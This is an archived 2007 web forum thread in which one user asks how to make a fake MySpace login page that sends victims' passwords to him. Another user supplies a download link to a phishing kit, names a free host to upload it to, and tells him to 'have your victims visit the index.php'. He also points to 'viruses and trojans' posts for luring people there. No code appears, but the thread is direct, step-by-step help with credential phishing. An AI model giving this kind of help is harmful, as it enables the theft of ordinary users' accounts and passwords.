PDA

View Full Version : Mysace...Help

Lino24
06-15-2007, 11:14 PM
Hey,can some bodie help me for a fake myspace log in...how do i make it so it sends infomation to my email adress when some bodie sighns in!?...all help would be appreciated...thanks;)

Lino24
06-15-2007, 11:21 PM
but if theres any fourms or posts explaing this could n-e * post it in here!?. thanks in advance:)

dipman44
06-15-2007, 11:36 PM
but if theres any fourms or posts explaing this could n-e * post it in here!?. thanks in advance:)

well you can make it send to your email address but its kind of stupid that way but you could just have the password come up on the server you uploded it to

http://login2myspace2.t*5.com/bestone.zip

just go there and download then register at 007ihost.com then upload both files to your account at 007ihost (in filemanager) then have your victims visit the index.php

if your wondering on how to get them to get to the fake login screen just look at the viruses and trojans section of the forum and i uploaded some codes there

Lino24
06-15-2007, 11:42 PM
thanks;)..i allreedy made an account on that website,and so dausr this mean when they sighn on it will automatically send the infomation to my account on that website if i use that file!?...